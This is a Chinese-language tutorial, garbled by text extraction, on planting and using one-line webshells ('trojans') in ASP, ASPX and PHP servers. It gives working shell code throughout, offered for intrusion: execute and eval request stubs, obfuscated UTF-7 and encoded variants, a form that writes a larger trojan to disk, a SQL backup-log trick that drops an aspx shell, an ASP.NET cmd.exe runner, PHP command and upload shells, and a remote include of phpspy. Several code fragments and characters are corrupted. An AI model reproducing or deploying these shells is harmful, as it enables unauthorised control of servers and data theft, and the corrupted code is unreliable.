一句話木馬的原理及利用

1、一句話木馬的原理及利用(asp,aspx,php,jsp) 一句話木馬的適用環(huán)境：1服務器的來賓賬戶有寫入權限已知數據庫地址且數據庫格式為asa或asp在數據庫格式不為asp或asa的情況下，如果能將一句話插入到asp文件中也可一句話木馬的工作原理：一句話木馬服務端(本地的html提交文件)就是我們要用來插入到asp文件中的asp語句，(不僅僅是以asp為后綴的數據庫文件)，該 語句將回為觸發(fā)，接收入侵者通過客戶端提交的數據，執(zhí)行并完成相應的操作，服務端的代 碼內容為 v%execute request(value)% 其中value可以自己修改一句話木馬客戶端(遠程服務器上被插入一句話的as

2、p文件)用來向服務端提交控制數據的，提交的數據通過服務端構成完整的asp功能語句并執(zhí)行，也 就是生成我們所需要的asp木馬文件現(xiàn)在先假設在遠程主機的TEXT.ASP(客戶端)中已經有了v%execute request(value)%這個 語句.)在ASP里v%execute )%意思是執(zhí)行省略號里的語句.那么如果我寫進我們精心構造的語句，它也是會幫我們執(zhí)行的就按照這上面的思路，我們就可以在本地構造一個表 單內容如下:(/為注釋)vform action=http:主機路 徑/TEXT.asp method=postset lP=server.createObject(Adodb.Stream

3、)/建立流對象lP.Open /打開lP.Type=2 /以文本方式lP.CharSet=gb2312 /字體標準lP.writetext request(newvalue)lP.SaveToFile server.mappath(newmm.asp),2 /將木馬 內容以覆蓋文件的方式寫入 newmm.asp, 2就是已覆 蓋的方式lP.Close 關閉對象set lP=nothing 釋放對象response.redirect newmm.asp /轉向 newmm.asp 添 入生成 木馬的 內容 v/textareavBRvcentervbr表單的作用就是把我們表單里的內容提交到遠程主

4、機的 TEXT.ASP這個文件.然后因為 TEXT.ASP里有v%execute request(value)%這句，那么這句代碼就會執(zhí)行我們從表單里傳 來的內容哦.(表單名必須和v%execute request(value)%里的VALUE 一樣，就是我用藍色標 記的那兩處，必須相等)說到這里大家是不是清楚了 我們構造了兩個表單，第一個表單里的代碼是文件操作的代碼 (就是把第二個表單內的內容寫入在當前目錄下并命名為newvalue.ASP的這么一段操作的處 理代碼)那么第二個表單當然就是我們要寫入的馬了.具體的就是下面這一段：set lP=server.createObject(Adodb

5、.Stream)/建立流對象lP.Open /打開lP.Type=2 /以文本方式lP.CharSet=gb2312 /字體標準 lP.writetext request(newvalue)lP.SaveToFile server.mappath(newvalue.asp),2 / 將木馬 內容以覆蓋文 件的方式寫入 newmm.asp, 2就是已覆 蓋的方式lP.Close 關閉對象set lP=nothing 釋放對象response.redirect newmm.asp /轉向 newmm.asp這樣的話第二個表單的名字必須和lP.writetext request(newvalue)里

6、的Newvalue 一樣，就是 我用紅色標注的那兩處.至此只要服務器有寫的權限你表單所提交的大馬內容就會被寫入到newmm.asp中。即newmm.asp為我們的shell地址。關于服務器錯誤：經常,當我們在一個asp文件內添加了一句話后，就會出現(xiàn)類型不匹配的錯誤：Script error detected at line 1.Source line: execute request(nettoo)Description:類型不匹配：execute這個如何解決呢？想出了一個好辦法,只要用eval 替換掉execute 服務端，就不會出錯了！用一句話客戶端連接，加入容錯語句，你可以把它插入到任何

7、ASP文件而不會像以前一樣 出錯。常見asp 一句話木馬的變體: v%set ms = server.CreateObject(MSScriptControl.ScriptControl.l)ms.Language=VBScriptms.AddObject Response, Responsems.AddObject request, requestms.AddObject session, sessionms.AddObject server, serverms.AddObject application, applicationms.ExecuteStatement (ex &ecute(

8、request(chr(35)%v%ExecuteGlobal request(chr(35)%v%ExecuteGlobal request(chr(35)%if request(chr(35) thenExecuteGlobal request(chr(35) 9 月 30 日數據庫里插入枷數畣整燿煥敵瑳v IT愾utf-7的馬 v%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%v% LANGUAGE = VBScript.Encode %v%#PgAAAA=r6P.;!

9、+/D14D v&X#*!*ErPPD4+P2XED+VVG4Cs,Dn;!n/DA4M & Xb*oBMAAA=A#%各種環(huán)境下的一句話木馬：aspx1相當于ASP的一句話木馬：程序代碼alter database pubs set RECOVERY FULL-create table pubs.dbo.cmd(a image)backup log pubs to disk = c:TM with initinsert into pubs.dbo.cmd(a) values (v%System.IO.StreamWriterow=newSystem.IO.StreamWriter(Serve

10、r.MapPath(images.aspx),false);ow.Write(Request.Paramsl);o w.Close()% )backup log pubs to disk = d:test11.aspx這個和asp的一樣，客戶端post 一個變量1把木馬代碼丟在變量l里面就ok 了這個是類 似asp的一句話木馬。/mu.aspx.htm 客戶端:(提交后訪問: HYPERLINK http:/IP/images.aspx http:/IP/images.aspx)vform action= HYPERLINK 00/asp/mu.aspx 00/asp/mu.aspx meth

11、od=postvb在下面輸入大馬內容:v/bxbrSub RunCmd(Src As Object, E As EventArgs)Dim myProcess As New Process()Dim myProcessStartInfo As New ProcessStartlnfo(xpath.Text) myProcessStartInfo.UseShellExecute = False myProcessStartInfo.RedirectStandardOutput = true myProcess.StartInfo = myProcessStartInfomyProcessStar

12、tInfo.Arguments=xCmd.textmyProcess.Start()Dim myStreamReader As StreamReader = myProcess.StandardOutputDim myString As String = myStreamReader.Readtoend()myProcess.Close()mystring=replace(mystring,)result.text= vbcrlf & vpre & mystring & End Subv/scriptxhtmlvheadvtitleASP.NET Shell for WebAdmin2.X F

13、inalv/titlevmeta http-equiv=Content-Type c /v/headvbodyvform runat=servervasp:Labelid=L_pstyle=COLOR:#OOOOffrunat=serverwidth=80px;Programv/asp:Labelvasp:TextBox id=xpath style=BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px

14、solid runat=server Width=300pxc:windowssystem32cmd.exev/asp:TextBoxvbr /Arguments/c net userv/pv/formv/bodyv/htmlv/textareavBRvcentervbrprivate void bc(object o,EventArgse)stringu=files;stringfilename;intpos=f.PostedFile.FileName.LastIndexOf();filename=f.PostedFile.FileName.Substring(pos + 1);f.Post

15、edFile.SaveAs(Server.MapPath(u)+filename);v/scriptvform method=post runat=server)backup log pubs to disk = c:inetpubwwwroottest11.aspxPHP本文沒有什么特別之處，僅求拋磚引玉。并送給和我一樣菜的在PHP門邊徘徊的朋友。 剛學PHP沒幾天，我就急于功成，所以有錯誤及不足之處請大家積極指出。PHP語法的強大是ASP望塵莫及的，僅一個:v? phpinfo();?就可以刺探整個服務器的配置。 運行cmd,上傳文件等，都是非常簡便的，現(xiàn)在用的好的PHP木馬，莫過于ang

16、el的phpspy 了。昨天hak_ban問怎么給PHP木馬加密，我還沒想到，但是對于寫一個微型PHP木馬， 我想還是很難被殺的。這里簡單探討一下幾個函數可以作為木馬的使用：可以運行外部命令的幾個函數：system,passthru,exec,shell_exec,popen。例：只要將等保存為cmd.php及可實現(xiàn)運行外部命令的功能。這幾個函數 可以說是最早的微行php木馬了，所以一般虛擬主機的設置也會將這些函數屏蔽的。還記得WDB論壇的style.php的漏洞嗎？我們可以利用這個做個很難被殺的小木馬。如 下：將其保存為1.php，我們就可以調用其他不支持php服務器里的.php木馬(如ph

17、pspy.php) 來達至U我們的 目的： HYPERLINK http:/target.eom/1.php http:/target.eom/1.php? Include= HYPERLINK /phpspy.php /phpspy.php 這里是不支持php 的,否則將會在這臺服務器運行 phpspy.php,而不是目標服務器。這個還是angel在Discuz 2.2F的攻擊中給我們的一個非常好的上傳木馬，我沒有改： v?copy($_FILESMyFiletmp_name,$_FILESMyFilename);?將其保存為up.php后，在本地提交表單：vform ENCTYPE=mul

18、tipart/form-data ACTION=http: 目標服務器 /up.php METHOD=POSTvinput NAME=MyFile TYPE=filevinput VALUE=提交 ” TYPE=submitv/form就可以把大個的php木馬上傳上去。我一直在想有沒有同冰狐浪子的那個ASP句話木馬一樣通過本地表單提交運行的PHP 木馬。終于找到了函數：eval，在PHP4中文參考手冊上它的語法說明：語法:void eval(string code_str);內容說明：本函數可將字符串之中的變量值代入，通常用在處理數據庫的資料上。參數 code_str為欲處理的字符串。值的 注意的是待處理的字符串要符合PHP的字符串格式， 同時在結尾處要有分號。使用本函數處理后的字符串會沿續(xù)到PHP程序結束。我們可以在目標主機上保存:v?eval($cmd);?為一個PHP文件